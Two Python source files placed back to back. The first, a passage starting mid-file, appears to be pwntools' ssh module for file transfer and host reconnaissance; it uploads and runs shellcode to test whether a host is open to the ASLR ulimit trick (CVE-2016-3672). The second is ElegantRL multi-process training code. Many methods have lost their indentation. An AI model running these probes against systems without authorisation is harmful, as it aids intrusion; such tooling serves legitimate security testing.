self.error('Unable to find libraries for %r' % remote)
return {}
return misc.parse_ldd_output(data)
def _get_fingerprint(self, remote):
cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
cmd = cmd + sh_string(remote)
data, status = self.run_to_end(cmd)
if status != 0:
return None
# OpenSSL outputs in the format of...
# (stdin)= e3b0c4429...
data = data.replace('(stdin)= ','')
# sha256 and sha256sum outputs in the format of...
# e3b0c442... -
data = data.replace('-','')
return data.strip()
def _get_cachefile(self, fingerprint):
return os.path.join(self._cachedir, fingerprint)
def _verify_local_fingerprint(self, fingerprint):
if not set(fingerprint).issubset(string.hexdigits) or \
len(fingerprint) != 64:
self.error('Invalid fingerprint %r' % fingerprint)
return False
local = self._get_cachefile(fingerprint)
if not os.path.isfile(local):
return False
if hashes.sha256filehex(local) == fingerprint:
return True
else:
os.unlink(local)
return False
    def _download_raw(self, remote, local, h):
        """Download ``remote`` to the local path ``local``, reporting progress
        on the progress handle ``h``.  Prefers SFTP, falls back to cat(1)."""
        # Progress callback shared by both transfer paths.
        def update(has, total):
            h.status("%s/%s" % (misc.size(has), misc.size(total)))
        # Fast path: SFTP transfer with built-in progress reporting.
        if self.sftp:
            try:
                self.sftp.get(remote, local, update)
                return
            except IOError:
                pass
        # Fallback: measure the size with wc(1), then stream it via cat(1).
        cmd = 'wc -c < ' + sh_string(remote)
        total, exitcode = self.run_to_end(cmd)
        if exitcode != 0:
            h.failure("%r does not exist or is not accessible" % remote)
            return
        total = int(total)
        with context.local(log_level = 'ERROR'):
            cmd = 'cat < ' + sh_string(remote)
            c = self.run(cmd)
            data = ''
            while True:
                try:
                    data += c.recv()
                except EOFError:
                    break
                update(len(data), total)
            result = c.wait()
            if result != 0:
                h.failure('Could not download file %r (%r)' % (remote, result))
                return
            # NOTE(review): written in text mode; binary content relies on
            # Python 2 str semantics here -- confirm before porting.
            with open(local, 'w') as fd:
                fd.write(data)
def _download_to_cache(self, remote, p):
with context.local(log_level='error'):
remote = self.readlink('-f',remote)
fingerprint = self._get_fingerprint(remote)
if fingerprint is None:
local = os.path.normpath(remote)
local = os.path.basename(local)
local += time.strftime('-%Y-%m-%d-%H:%M:%S')
local = os.path.join(self._cachedir, local)
self._download_raw(remote, local, p)
return local
local = self._get_cachefile(fingerprint)
if self.cache and self._verify_local_fingerprint(fingerprint):
p.success('Found %r in ssh cache' % remote)
else:
self._download_raw(remote, local, p)
if not self._verify_local_fingerprint(fingerprint):
p.failure('Could not download file %r' % remote)
return local
    def download_data(self, remote):
        """Downloads a file from the remote server and returns it as a string.
        Arguments:
            remote(str): The remote filename to download.
        Examples:
            >>> with file('/tmp/bar','w+') as f:
            ...     f.write('Hello, world')
            >>> s = ssh(host='example.pwnme',
            ...         user='travis',
            ...         password='demopass',
            ...         cache=False)
            >>> s.download_data('/tmp/bar')
            'Hello, world'
            >>> s._sftp = None
            >>> s._tried_sftp = True
            >>> s.download_data('/tmp/bar')
            'Hello, world'
        """
        # Fetch into the cache (or reuse an existing entry), then read back.
        with self.progress('Downloading %r' % remote) as p:
            with open(self._download_to_cache(remote, p)) as fd:
                return fd.read()
def download_file(self, remote, local = None):
"""Downloads a file from the remote server.
The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
calling the function twice has little overhead.
Arguments:
remote(str): The remote filename to download
local(str): The local filename to save it to. Default is to infer it from the remote filename.
"""
if not local:
local = os.path.basename(os.path.normpath(remote))
if os.path.basename(remote) == remote:
remote = os.path.join(self.cwd, remote)
with self.progress('Downloading %r to %r' % (remote, local)) as p:
local_tmp = self._download_to_cache(remote, p)
# Check to see if an identical copy of the file already exists
if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
shutil.copy2(local_tmp, local)
    def download_dir(self, remote=None, local=None):
        """Recursively downloads a directory from the remote server
        Arguments:
            local: Local directory
            remote: Remote directory
        """
        remote = remote or self.cwd
        # Canonicalize the remote path (resolving symlinks).
        if self.sftp:
            remote = str(self.sftp.normalize(remote))
        else:
            with context.local(log_level='error'):
                # NOTE(review): self.system() returns an ssh_channel, not the
                # command's output -- this branch likely needs
                # ``.recvall().strip()`` appended before the os.path calls
                # below can work; confirm against callers.
                remote = self.system('readlink -f ' + sh_string(remote))
        dirname = os.path.dirname(remote)
        basename = os.path.basename(remote)
        local = local or '.'
        local = os.path.expanduser(local)
        self.info("Downloading %r to %r" % (basename,local))
        # Pack the directory into a remote tarball, download it, and extract.
        with context.local(log_level='error'):
            remote_tar = self.mktemp()
            cmd = 'tar -C %s -czf %s %s' % \
                (sh_string(dirname),
                 sh_string(remote_tar),
                 sh_string(basename))
            tar = self.system(cmd)
            if 0 != tar.wait():
                self.error("Could not create remote tar")
            local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
            self.download_file(remote_tar, local_tar.name)
        # NOTE(review): extractall() on an attacker-controlled archive can
        # write outside ``local`` via path traversal; confirm trust model.
        tar = tarfile.open(local_tar.name)
        tar.extractall(local)
def upload_data(self, data, remote):
"""Uploads some data into a file on the remote server.
Arguments:
data(str): The data to upload.
remote(str): The filename to upload it to.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.upload_data('Hello, world', '/tmp/upload_foo')
>>> print file('/tmp/upload_foo').read()
Hello, world
>>> s._sftp = False
>>> s._tried_sftp = True
>>> s.upload_data('Hello, world', '/tmp/upload_bar')
>>> print file('/tmp/upload_bar').read()
Hello, world
"""
# If a relative path was provided, prepend the cwd
if os.path.normpath(remote) == os.path.basename(remote):
remote = os.path.join(self.cwd, remote)
if self.sftp:
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.sftp.put(f.name, remote)
return
with context.local(log_level = 'ERROR'):
cmd = 'cat > ' + sh_string(remote)
s = self.run(cmd, tty=False)
s.send(data)
s.shutdown('send')
data = s.recvall()
result = s.wait()
if result != 0:
self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
"""Uploads a file to the remote server. Returns the remote filename.
Arguments:
filename(str): The local filename to download
remote(str): The remote filename to save it to. Default is to infer it from the local filename."""
if remote == None:
remote = os.path.normpath(filename)
remote = os.path.basename(remote)
remote = os.path.join(self.cwd, remote)
with open(filename) as fd:
data = fd.read()
self.info("Uploading %r to %r" % (filename,remote))
self.upload_data(data, remote)
return remote
def upload_dir(self, local, remote=None):
"""Recursively uploads a directory onto the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
local = os.path.expanduser(local)
dirname = os.path.dirname(local)
basename = os.path.basename(local)
if not os.path.isdir(local):
self.error("%r is not a directory" % local)
msg = "Uploading %r to %r" % (basename,remote)
with self.waitfor(msg) as w:
# Generate a tarfile with everything inside of it
local_tar = tempfile.mktemp()
with tarfile.open(local_tar, 'w:gz') as tar:
tar.add(local, basename)
# Upload and extract it
with context.local(log_level='error'):
remote_tar = self.mktemp('--suffix=.tar.gz')
self.upload_file(local_tar, remote_tar)
untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
message = untar.recvrepeat(2)
if untar.wait() != 0:
self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
def upload(self, file_or_directory, remote=None):
"""upload(file_or_directory, remote=None)
Upload a file or directory to the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
remote(str): Local path to store the data.
By default, uses the working directory.
"""
if isinstance(file_or_directory, str):
file_or_directory = os.path.expanduser(file_or_directory)
file_or_directory = os.path.expandvars(file_or_directory)
if os.path.isfile(file_or_directory):
return self.upload_file(file_or_directory, remote)
if os.path.isdir(file_or_directory):
return self.upload_dir(file_or_directory, remote)
self.error('%r does not exist' % file_or_directory)
    def download(self, file_or_directory, local=None):
        """download(file_or_directory, local=None)

        Download a file or directory from the remote host.

        Arguments:
            file_or_directory(str): Path to the file or directory to download.
            local(str): Local path to store the data.
                By default, uses the current directory.
        """
        # NOTE(review): SFTP is presumably required by the download helpers
        # called below — confirm; this guard only gives an early clear error.
        if not self.sftp:
            self.error("Cannot determine remote file type without SFTP")

        # 'test -d' exits with status 0 iff the remote path is a directory.
        with self.system('test -d ' + sh_string(file_or_directory)) as io:
            is_dir = io.wait()

        if 0 == is_dir:
            self.download_dir(file_or_directory, local)
        else:
            self.download_file(file_or_directory, local)
put = upload
get = download
def unlink(self, file):
"""unlink(file)
Delete the file on the remote host
Arguments:
file(str): Path to the file
"""
if not self.sftp:
self.error("unlink() is only supported if SFTP is supported")
return self.sftp.unlink(file)
def libs(self, remote, directory = None):
"""Downloads the libraries referred to by a file.
This is done by running ldd on the remote server, parsing the output
and downloading the relevant files.
The directory argument specified where to download the files. This defaults
to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server."""
libs = self._libs_remote(remote)
remote = self.readlink('-f',remote).strip()
libs[remote] = 0
if directory == None:
directory = self.host
directory = os.path.realpath(directory)
res = {}
seen = set()
for lib, addr in libs.items():
local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
if not local.startswith(directory):
self.warning('This seems fishy: %r' % lib)
continue
misc.mkdir_p(os.path.dirname(local))
if lib not in seen:
self.download_file(lib, local)
seen.add(lib)
res[local] = addr
return res
def interactive(self, shell=None):
"""Create an interactive session.
This is a simple wrapper for creating a new
:class:`pwnlib.tubes.ssh.ssh_channel` object and calling
:meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
s = self.shell(shell)
if self.cwd != '.':
cmd = 'cd ' + sh_string(self.cwd)
s.sendline(cmd)
s.interactive()
s.close()
    def set_working_directory(self, wd = None, symlink = False):
        """Sets the working directory in which future commands will
        be run (via ssh.run) and to which files will be uploaded/downloaded
        from if no path is provided

        Note:
            This uses ``mktemp -d`` under the covers, sets permissions
            on the directory to ``0700``. This means that setuid binaries
            will **not** be able to access files created in this directory.

            In order to work around this, we also ``chmod +x`` the directory.

        Arguments:
            wd(string): Working directory. Default is to auto-generate a directory
                based on the result of running 'mktemp -d' on the remote machine.
            symlink(bool,str): Create symlinks in the new directory.

                The default value, ``False``, implies that no symlinks should be
                created.

                A string value is treated as a path that should be symlinked.
                It is passed directly to the shell on the remote end for expansion,
                so wildcards work.

                Any other value is treated as a boolean, where ``True`` indicates
                that all files in the "old" working directory should be symlinked.

        Examples:
            >>> s = ssh(host='example.pwnme',
            ...         user='travis',
            ...         password='demopass')
            >>> cwd = s.set_working_directory()
            >>> s.ls()
            ''
            >>> s.pwd() == cwd
            True

            >>> s = ssh(host='example.pwnme',
            ...         user='travis',
            ...         password='demopass')
            >>> homedir = s.pwd()
            >>> _=s.touch('foo')

            >>> _=s.set_working_directory()
            >>> assert s.ls() == ''

            >>> _=s.set_working_directory(homedir)
            >>> assert 'foo' in s.ls().split()

            >>> _=s.set_working_directory(symlink=True)
            >>> assert 'foo' in s.ls().split()
            >>> assert homedir != s.pwd()

            >>> symlink=os.path.join(homedir,'*')
            >>> _=s.set_working_directory(symlink=symlink)
            >>> assert 'foo' in s.ls().split()
            >>> assert homedir != s.pwd()
        """
        status = 0

        # symlink=True means "symlink everything from the old cwd":
        # expand it to a shell glob over the current working directory.
        if symlink and not isinstance(symlink, str):
            symlink = os.path.join(self.pwd(), '*')

        if not wd:
            # Auto-generate a 0700 temp dir; 'chmod +x' works around setuid access.
            wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
            wd = wd.strip()

            if status:
                self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))

        else:
            # Sanity-check that a user-supplied directory actually exists.
            cmd = 'ls ' + sh_string(wd)
            _, status = self.run_to_end(cmd, wd = '.')

            if status:
                self.error("%r does not appear to exist" % wd)

        self.info("Working directory: %r" % wd)
        self.cwd = wd

        if symlink:
            self.ln('-s', symlink, '.')

        return self.cwd
def write(self, path, data):
"""Wrapper around upload_data to match :func:`pwnlib.util.misc.write`"""
return self.upload_data(data, path)
def read(self, path):
"""Wrapper around download_data to match :func:`pwnlib.util.misc.read`"""
return self.download_data(path)
    def _init_remote_platform_info(self):
        """Fills _platform_info, e.g.:

        ::
            {'distro': 'Ubuntu\n',
             'distro_ver': '14.04\n',
             'machine': 'x86_64',
             'node': 'pwnable.kr',
             'processor': 'x86_64',
             'release': '3.11.0-12-generic',
             'system': 'linux',
             'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}
        """
        # Cached: probing the remote host is expensive, do it once.
        if self._platform_info:
            return

        def preexec():
            # Runs on the remote side: print one uname field per line.
            import platform
            print('\n'.join(platform.uname()))

        with context.quiet:
            with self.process('true', preexec_fn=preexec) as io:
                # recvline order must match platform.uname() field order:
                # system, node, release, version, machine, processor.
                self._platform_info = {
                    'system': io.recvline().lower().strip(),
                    'node': io.recvline().lower().strip(),
                    'release': io.recvline().lower().strip(),
                    'version': io.recvline().lower().strip(),
                    'machine': io.recvline().lower().strip(),
                    'processor': io.recvline().lower().strip(),
                    'distro': 'Unknown',
                    'distro_ver': ''
                }

        try:
            if not self.which('lsb_release'):
                return

            # 'lsb_release -irs' prints distributor ID then release, one per line.
            with self.process(['lsb_release', '-irs']) as io:
                self._platform_info.update({
                    'distro': io.recvline().strip(),
                    'distro_ver': io.recvline().strip()
                })
        except Exception:
            # Best effort: distro info stays 'Unknown' on any failure.
            pass
@property
def os(self):
""":class:`str`: Operating System of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(os=self._platform_info['system']):
return context.os
except Exception:
return "Unknown"
@property
def arch(self):
""":class:`str`: CPU Architecture of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(arch=self._platform_info['machine']):
return context.arch
except Exception:
return "Unknown"
@property
def bits(self):
""":class:`str`: Pointer size of the remote machine."""
try:
with context.local():
context.clear()
context.arch = self.arch
return context.bits
except Exception:
return context.bits
@property
def version(self):
""":class:`tuple`: Kernel version of the remote machine."""
try:
self._init_remote_platform_info()
vers = self._platform_info['release']
# 3.11.0-12-generic
expr = r'([0-9]+\.?)+'
vers = re.search(expr, vers).group()
return tuple(map(int, vers.split('.')))
except Exception:
return (0,0,0)
@property
def distro(self):
""":class:`tuple`: Linux distribution name and release."""
try:
self._init_remote_platform_info()
return (self._platform_info['distro'], self._platform_info['distro_ver'])
except Exception:
return ("Unknown", "Unknown")
    @property
    def aslr(self):
        """:class:`bool`: Whether ASLR is enabled on the system.

        Example:

            >>> s = ssh("travis", "example.pwnme")
            >>> s.aslr
            True
        """
        # Cached after the first probe.
        if self._aslr is None:
            if self.os != 'linux':
                self.warn_once("Only Linux is supported for ASLR checks.")
                self._aslr = False

            else:
                with context.quiet:
                    # /proc value: 0 = disabled, 1/2 = enabled.
                    rvs = self.read('/proc/sys/kernel/randomize_va_space')

                # NOTE(review): if self.read() returns bytes on Python 3,
                # startswith('0') would raise -- confirm read()'s return type.
                self._aslr = not rvs.startswith('0')

        return self._aslr
    @property
    def aslr_ulimit(self):
        """:class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit."""
        import pwnlib.elf.elf
        import pwnlib.shellcraft

        # Cached after the first (expensive) remote probe.
        if self._aslr_ulimit is not None:
            return self._aslr_ulimit

        # This test must run a 32-bit binary, fix the architecture
        arch = {
            'amd64': 'i386',
            'aarch64': 'arm'
        }.get(self.arch, self.arch)

        with context.local(arch=arch, bits=32, os=self.os, aslr=True):
            with context.quiet:
                try:
                    # Build a tiny shared (PIE) binary that dumps its own maps.
                    sc = pwnlib.shellcraft.cat('/proc/self/maps') \
                        + pwnlib.shellcraft.exit(0)

                    elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
                except Exception:
                    self.warn_once("Can't determine ulimit ASLR status")
                    self._aslr_ulimit = False
                    return self._aslr_ulimit

        def preexec():
            # Runs remotely before exec: an unlimited stack is the ulimit
            # trick that degrades mmap randomization for 32-bit processes.
            import resource
            try:
                resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
            except Exception:
                pass

        # Move to a new temporary directory
        cwd = self.cwd
        tmp = self.set_working_directory()

        try:
            self.upload(elf.path, './aslr-test')
        except IOError:
            self.warn_once("Couldn't check ASLR ulimit trick")
            self._aslr_ulimit = False
            return False

        self.process(['chmod', '+x', './aslr-test']).wait()
        maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()

        # Move back to the old directory
        self.cwd = cwd

        # Clean up the files
        self.process(['rm', '-rf', tmp]).wait()

        # Check for 555555000 (1/3 of the address space for PAE)
        # and for 40000000 (1/3 of the address space with 3BG barrier)
        self._aslr_ulimit = bool('55555000' in maps or '40000000' in maps)

        return self._aslr_ulimit
def _checksec_cache(self, value=None):
path = self._get_cachefile('%s-%s' % (self.host, self.port))
if value is not None:
with open(path, 'w+') as f:
f.write(value)
elif os.path.exists(path):
with open(path, 'r+') as f:
return f.read()
    def checksec(self, banner=True):
        """checksec()

        Prints a helpful message about the remote system.

        Arguments:
            banner(bool): Whether to print the path to the ELF binary.
        """
        # NOTE(review): 'banner' is accepted but never used in this body.
        cached = self._checksec_cache()
        if cached:
            return cached

        red    = text.red
        green  = text.green
        yellow = text.yellow

        res = [
            "%s@%s:" % (self.user, self.host),
            "Distro".ljust(10) + ' '.join(self.distro),
            "OS:".ljust(10) + self.os,
            "Arch:".ljust(10) + self.arch,
            "Version:".ljust(10) + '.'.join(map(str, self.version)),
            "ASLR:".ljust(10) + {
                True: green("Enabled"),
                False: red("Disabled")
            }[self.aslr]
        ]

        if self.aslr_ulimit:
            res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]

        cached = '\n'.join(res)
        self._checksec_cache(cached)
        return cached
|
run_parallel.py | import os
import sys
import time
import torch
import numpy as np
import multiprocessing as mp
from elegantrl.envs.Gym import build_env, build_eval_env
from elegantrl.train.replay_buffer import ReplayBufferMP
from elegantrl.train.evaluator import Evaluator
def train_and_evaluate_mp(args, agent_id=0):
    """Spawn learner/worker/evaluator processes and run multi-process training.

    Arguments:
        args: experiment Arguments object (project type); must provide
            init_before_training(), learner_gpus, env_num and worker_num.
        agent_id: identifier handed to the evaluator process.
    """
    args.init_before_training()  # necessary!

    process = list()
    mp.set_start_method(method='spawn', force=True)  # force all the multiprocessing to 'spawn' methods

    '''learner'''
    learner_num = len(args.learner_gpus)
    learner_pipe = PipeLearner(learner_num)
    for learner_id in range(learner_num):
        '''evaluator'''
        # Only the last learner gets an evaluator attached.
        if learner_id == learner_num - 1:
            evaluator_pipe = PipeEvaluator()
            process.append(mp.Process(target=evaluator_pipe.run, args=(args, agent_id)))
        else:
            evaluator_pipe = None

        '''explorer'''
        worker_pipe = PipeWorker(args.env_num, args.worker_num)
        for worker_id in range(args.worker_num):
            process.append(mp.Process(target=worker_pipe.run, args=(args, worker_id, learner_id)))

        process.append(mp.Process(target=learner_pipe.run, args=(args, evaluator_pipe, worker_pipe, learner_id)))

    # Fix: was a list comprehension used purely for side effects.
    for p in process:
        p.start()
        time.sleep(0.1)  # stagger start-up to reduce contention

    process[-1].join()
    process_safely_terminate(process)
class PipeWorker:
    """Explorer side of the learner<->worker communication.

    One PipeWorker owns ``worker_num`` pipes; the learner process calls
    explore() while each worker process runs run() in its own process.
    """

    def __init__(self, env_num, worker_num):
        # Number of (vectorized) environments per worker.
        self.env_num = env_num
        # Number of parallel explorer processes.
        self.worker_num = worker_num
        self.pipes = [mp.Pipe() for _ in range(worker_num)]
        # Learner-side pipe ends.
        self.pipe1s = [pipe[1] for pipe in self.pipes]

    def explore(self, agent):
        """Broadcast the actor weights and collect one trajectory list per worker.

        Called from the learner process; blocks until every worker replies.
        """
        act_dict = agent.act.state_dict()

        if sys.platform == 'win32':  # Avoid CUDA runtime error (801)
            # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
            for key, value in act_dict.items():
                act_dict[key] = value.to(torch.device('cpu'))

        for worker_id in range(self.worker_num):
            self.pipe1s[worker_id].send(act_dict)
        traj_lists = [pipe1.recv() for pipe1 in self.pipe1s]
        return traj_lists

    def run(self, args, worker_id, learner_id):  # not elegant: comm_env
        """Worker process loop: receive actor weights, explore, send trajectory back."""
        # print(f'| os.getpid()={os.getpid()} PipeExplore.run {learner_id}')
        env = build_env(env=args.env, if_print=False,
                        env_num=args.env_num, device_id=args.workers_gpus[learner_id], args=args, )

        '''init Agent'''
        agent = args.agent
        agent.init(net_dim=args.net_dim, state_dim=args.state_dim, action_dim=args.action_dim,
                   gamma=args.gamma, reward_scale=args.reward_scale,
                   learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae,
                   env_num=args.env_num, gpu_id=args.learner_gpus[learner_id], )
        if args.env_num == 1:
            agent.states = [env.reset(), ]
        else:
            agent.states = env.reset()  # VecEnv

        '''loop'''
        target_step = args.target_step
        # Drop the (large) config object before entering the loop.
        del args

        with torch.no_grad():
            while True:
                # Block until the learner sends fresh actor weights.
                act_dict = self.pipes[worker_id][0].recv()

                if sys.platform == 'win32':
                    # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
                    for key, value in act_dict.items():
                        act_dict[key] = value.to(agent.device)

                agent.act.load_state_dict(act_dict)
                trajectory = agent.explore_env(env, target_step)

                if sys.platform == 'win32':
                    # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
                    trajectory = [[item.to(torch.device('cpu'))
                                   for item in item_list]
                                  for item_list in trajectory]
                self.pipes[worker_id][0].send(trajectory)
class PipeLearner:
    """Learner-side pipes: trains the agent and pairwise-averages parameters
    across multiple learner GPUs (binary-tree style exchange)."""

    def __init__(self, learner_num):
        self.learner_num = learner_num
        # Number of pairwise-averaging rounds (log2 of the learner count).
        self.round_num = int(np.log2(learner_num))

        # First pipe set: trajectory exchange (round_id == -1).
        self.pipes = [mp.Pipe() for _ in range(learner_num)]
        # Second pipe set: parameter/optimizer-state exchange.
        pipes = [mp.Pipe() for _ in range(learner_num)]
        self.pipe0s = [pipe[0] for pipe in pipes]
        self.pipe1s = [pipe[1] for pipe in pipes]
        self.device_list = [torch.device(f'cuda:{i}') for i in range(learner_num)]

        # idx_l[i][round] is learner i's partner in that round.
        if learner_num == 1:
            self.idx_l = None
        elif learner_num == 2:
            self.idx_l = [(1,), (0,), ]
        elif learner_num == 4:
            self.idx_l = [(1, 2), (0, 3),
                          (3, 0), (2, 1), ]
        elif learner_num == 8:
            self.idx_l = [(1, 2, 4), (0, 3, 5),
                          (3, 0, 6), (2, 1, 7),
                          (5, 6, 0), (4, 7, 1),
                          (7, 4, 2), (6, 5, 3), ]
        else:
            print(f"| LearnerPipe, ERROR: learner_num {learner_num} should in (1, 2, 4, 8)")
            exit()

    def comm_data(self, data, learner_id, round_id):
        """Exchange `data` with this learner's partner for the given round.

        round_id == -1 uses the trajectory pipes; other rounds use the
        parameter pipes.
        """
        if round_id == -1:
            learner_jd = self.idx_l[learner_id][round_id]
            self.pipes[learner_jd][0].send(data)
            return self.pipes[learner_id][1].recv()
        else:
            learner_jd = self.idx_l[learner_id][round_id]
            self.pipe0s[learner_jd].send(data)
            return self.pipe1s[learner_id].recv()

    def comm_network_optim(self, agent, learner_id):
        """Pairwise-average networks and optimizer states across all learners."""
        device = self.device_list[learner_id]

        for round_id in range(self.round_num):
            data = get_comm_data(agent)
            data = self.comm_data(data, learner_id, round_id)

            if data:
                avg_update_net(agent.act, data[0], device)
                avg_update_optim(agent.act_optim, data[1], device) if data[1] else None
                avg_update_net(agent.cri, data[2], device) if data[2] else None
                avg_update_optim(agent.cri_optim, data[3], device)
                avg_update_net(agent.act_target, data[4], device) if agent.if_use_act_target else None
                avg_update_net(agent.cri_target, data[5], device) if agent.if_use_cri_target else None

    def run(self, args, comm_eva, comm_exp, learner_id=0):
        """Learner process loop: gather trajectories, update nets, sync, evaluate."""
        # print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}')
        pass  # NOTE(review): dead statement, likely left over from a removed debug print

        '''init Agent'''
        agent = args.agent
        agent.init(net_dim=args.net_dim, state_dim=args.state_dim, action_dim=args.action_dim,
                   gamma=args.gamma, reward_scale=args.reward_scale,
                   learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae,
                   env_num=args.env_num, gpu_id=args.learner_gpus[learner_id], )
        agent.save_or_load_agent(args.cwd, if_save=False)

        '''init ReplayBuffer'''
        if agent.if_off_policy:
            buffer_num = args.worker_num * args.env_num
            # With multiple learners, trajectories are also received from a peer.
            if self.learner_num > 1:
                buffer_num *= 2

            buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim,
                                    action_dim=1 if args.if_discrete else args.action_dim,
                                    if_use_per=args.if_per_or_gae,
                                    buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id])
            buffer.save_or_load_history(args.cwd, if_save=False)

            def update_buffer(_traj_list):
                # Off-policy: append each trajectory to its own sub-buffer.
                step_sum = 0
                r_exp_sum = 0
                for buffer_i, (ten_state, ten_other) in enumerate(_traj_list):
                    buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other)

                    step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0])  # other = (reward, mask, action)
                    step_sum += step_r_exp[0]
                    r_exp_sum += step_r_exp[1]
                return step_sum, r_exp_sum / len(_traj_list)
        else:
            buffer = list()

            def update_buffer(_traj_list):
                # On-policy: rebuild the whole buffer from this round's trajectories.
                _traj_list = list(map(list, zip(*_traj_list)))
                _traj_list = [torch.cat(t, dim=0) for t in _traj_list]
                (ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list
                buffer[:] = (ten_state.squeeze(1),
                             ten_reward,
                             ten_mask,
                             ten_action.squeeze(1),
                             ten_noise.squeeze(1))

                _step, _r_exp = get_step_r_exp(ten_reward=buffer[1])
                return _step, _r_exp

        '''start training'''
        cwd = args.cwd
        batch_size = args.batch_size
        repeat_times = args.repeat_times
        soft_update_tau = args.soft_update_tau
        del args

        if_train = True
        while if_train:
            traj_lists = comm_exp.explore(agent)
            if self.learner_num > 1:
                # Swap trajectories with the round -1 partner learner.
                data = self.comm_data(traj_lists, learner_id, round_id=-1)
                traj_lists.extend(data)
            traj_list = sum(traj_lists, list())

            if sys.platform == 'win32':  # Avoid CUDA runtime error (801)
                # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
                traj_list = [[item.to(torch.device('cpu'))
                              for item in item_list]
                             for item_list in traj_list]

            steps, r_exp = update_buffer(traj_list)
            del traj_lists

            logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
            if self.learner_num > 1:
                self.comm_network_optim(agent, learner_id)

            if comm_eva:
                if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple)

        agent.save_or_load_agent(cwd, if_save=True)
        if agent.if_off_policy:
            print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}")
            buffer.save_or_load_history(cwd, if_save=True)
class PipeEvaluator:  # [ElegantRL.10.21]
    """Evaluator-side pipe: the learner pushes actor weights when the
    evaluator is idle; the evaluator scores them and decides whether to stop."""

    def __init__(self):
        super().__init__()
        self.pipe0, self.pipe1 = mp.Pipe()

    def evaluate_and_save_mp(self, agent_act, steps, r_exp, logging_tuple):
        """Called from the learner: hand over actor weights if the evaluator is idle.

        Returns (if_train, if_save) as last reported by the evaluator.
        """
        if self.pipe1.poll():  # if_evaluator_idle
            if_train, if_save = self.pipe1.recv()
            # Ship a CPU copy of the actor so it can cross process boundaries.
            act_cpu_dict = {k: v.cpu() for k, v in agent_act.state_dict().items()}
        else:
            # Evaluator still busy: keep training without a new evaluation.
            if_train, if_save = True, False
            act_cpu_dict = None

        self.pipe1.send((act_cpu_dict, steps, r_exp, logging_tuple))
        return if_train, if_save

    def run(self, args, agent_id):
        """Evaluator process loop: receive actor weights, evaluate, report back."""
        # print(f'| os.getpid()={os.getpid()} PipeEvaluate.run {agent_id}')
        pass  # NOTE(review): dead statement, likely left over from a removed debug print

        '''init: Agent'''
        agent = args.agent
        agent.init(net_dim=args.net_dim, state_dim=args.state_dim, action_dim=args.action_dim,
                   gamma=args.gamma, reward_scale=args.reward_scale,
                   learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae,
                   env_num=args.env_num, gpu_id=args.eval_gpu_id, )
        agent.save_or_load_agent(args.cwd, if_save=False)

        act = agent.act
        # Evaluation only: gradients are never needed here.
        [setattr(param, 'requires_grad', False) for param in agent.act.parameters()]
        del agent

        '''init Evaluator'''
        eval_env = build_eval_env(args.eval_env, args.env, args.env_num, args.eval_gpu_id, args)
        evaluator = Evaluator(cwd=args.cwd, agent_id=agent_id,
                              eval_env=eval_env, eval_gap=args.eval_gap,
                              eval_times1=args.eval_times1, eval_times2=args.eval_times2,
                              target_return=args.target_return, if_overwrite=args.if_overwrite)
        evaluator.save_or_load_recoder(if_save=False)

        '''loop'''
        cwd = args.cwd
        break_step = args.break_step
        if_allow_break = args.if_allow_break
        del args

        if_save = False
        if_train = True
        if_reach_goal = False
        with torch.no_grad():
            while if_train:
                act_dict, steps, r_exp, logging_tuple = self.pipe0.recv()

                if act_dict:
                    act.load_state_dict(act_dict)
                    if_reach_goal, if_save = evaluator.evaluate_and_save(act, steps, r_exp, logging_tuple)
                else:
                    # No new weights: just account for the learner's steps.
                    evaluator.total_step += steps

                # Stop when the goal is reached, the step budget is spent,
                # or a '{cwd}/stop' file exists.
                if_train = not ((if_allow_break and if_reach_goal)
                                or evaluator.total_step > break_step
                                or os.path.exists(f'{cwd}/stop'))
                self.pipe0.send((if_train, if_save))

        print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}')
        evaluator.save_or_load_recoder(if_save=True)
def get_comm_data(agent):
    """Collect the tensors a learner exchanges with its peers:
    actor/critic parameters, optimizer states and (optional) target nets."""
